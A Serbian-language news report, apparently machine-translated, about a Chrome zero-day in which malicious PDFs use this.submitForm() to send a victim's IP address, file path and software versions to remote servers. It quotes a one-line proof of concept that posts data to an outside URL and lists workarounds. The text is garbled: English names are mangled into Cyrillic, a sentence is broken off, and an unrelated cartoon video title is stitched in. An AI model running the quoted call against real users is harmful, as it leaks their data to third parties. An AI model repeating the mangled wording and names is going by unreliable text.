Цхроме рањивост омогућава хакерима да прикупљају корисничке податке путем пдф датотека
Преглед садржаја:
Видео: Маша и Медведь (Masha and The Bear) - Подкидыш (23 Серия) 2024
Служба за откривање искориштавања ЕдгеСпот је открио интригантну Цхромову рањивост без дана коришћења ПДФ докумената. Рањивост омогућава нападачима да прикупљају осетљиве податке користећи злонамерне ПДФ документе отворене у Цхроме-у.
Чим жртва отвори одговарајуће ПДФ датотеке у Гоогле Цхроме-у, у позадини почиње са радом злонамерни програм прикупљањем корисничких података.
Подаци се затим прослеђују на удаљени сервер који контролишу хакери. Можда се питате који подаци нападају нападачи, циљају следеће податке на рачунару:
- ИП адреса
- Потпуна путања ПДФ датотеке у систем
- Верзије за ОС и Цхроме
Пазите на ПДФ датотеке са опуштеним софтвером
Можда ћете бити изненађени када знате да се ништа не догађа када се Адобе Реадер користи за отварање ПДФ датотека. Поред тога, ХТТП ПОСТ захтеви користе се за пренос података на удаљене сервере без икакве интервенције корисника.
Стручњаци су приметили да је један од два домена реаднотифицом или бурпцоллабораторнет примао податке.
Можете замислити интензитет напада узимајући у обзир чињеницу да већина антивирусног софтвера није у стању да детектује узорке које је открио ЕдгеСпот.
Стручњаци откривају да нападачи користе ПДФ ЈаваСцрипт Јавасцрипт АПИ „тхис.субмитФорм ()“ да би прикупили осетљиве информације корисника.
Тестирали смо га са минималним ПоЦ, једноставним АПИ позивом попут „тхис.субмитФорм („ хттп://гоогле.цом/тест “)“ Гоогле Цхроме ће послати личне податке на гоогле.цом.
Стручњаци су заправо открили да ову грешку у Цхромеу користе два различита скупа злонамерних ПДФ датотека. Обе стране су дистрибуиране у октобру 2017. и септембру 2018. године.
Нарочито, прикупљени подаци нападачи могу користити за фино подешавање напада у будућности. Извештаји указују да је прва серија датотека састављена помоћу РеадНотифи-ове услуге праћења ПДФ-а.
Корисници могу да користе услугу за праћење прегледа корисника. ЕдгеСпот није поделио никакве детаље у вези са природом другог скупа ПДФ датотека.
Како остати заштићен
Служба за откривање Екплоита ЕдгеСпот желела је да упозори кориснике Цхроме-а на потенцијалне ризике јер се не очекује да ће закрпа бити пуштена у блиској будућности.
ЕдгеСпот је прошле године известио Гоогле о рањивости и компанија је обећала да ће издати закрпу крајем априла. Х
међутим, можете размотрити коришћење привременог решења проблема локалним прегледом примљених ПДФ докумената користећи алтернативну апликацију за читање ПДФ-а.
Алтернативно, ПДФ документе можете да отворите и у Цхромеу тако што ћете прекинути везу са Интернетом. У међувремену, можете сачекати да се ажурира Цхроме 74 који се очекује 23. априла.
Ево како сакрити корисничке корисничке гумбе Мицрософтове ивице
Мицрософт има ових дана тестирану нову функцију, која укључује мало промена у Едге-овом корисничком интерфејсу. Ова нова функција коју доносимо у ствари није сасвим нова карактеристика. Компанија тренутно проверава како нова функционалност за Мицрософт Едге функционише. Ова функција омогућава корисницима…
Нетгеар усмјеривачи прикупљају аналитичке податке у корист приватности корисника
Недавно је ажуриран рутер Нетгеар Р7000 и једна од његових најновијих карактеристика укључује кршење приватности корисника. Прикупљање података о аналитикама Ово посебно ажурирање омогућава Нетгеару да прикупља аналитичке податке, преварајући кориснике да преузимају белешке о издању које се налазе на веб локацији Нетгеарс-а, а које корисницима препоручују ажурирање на најновију верзију. На страници подршке за Нетгеар, постоји…
Рањивост Оутлоока омогућава хакерима да краду хешеве за лозинке
Мицрософт Оутлоок једна је од најпопуларнијих платформи за е-пошту на свету. Лично се ослањам на своју Оутлоок адресу е-поште и за радне и за личне задатке. Нажалост, Оутлоок можда није толико сигуран како бисмо корисници желели да мислимо. Према извештају који је објавио Царнегие Меллон Институт за софтверски инжењеринг, Оутлоок ...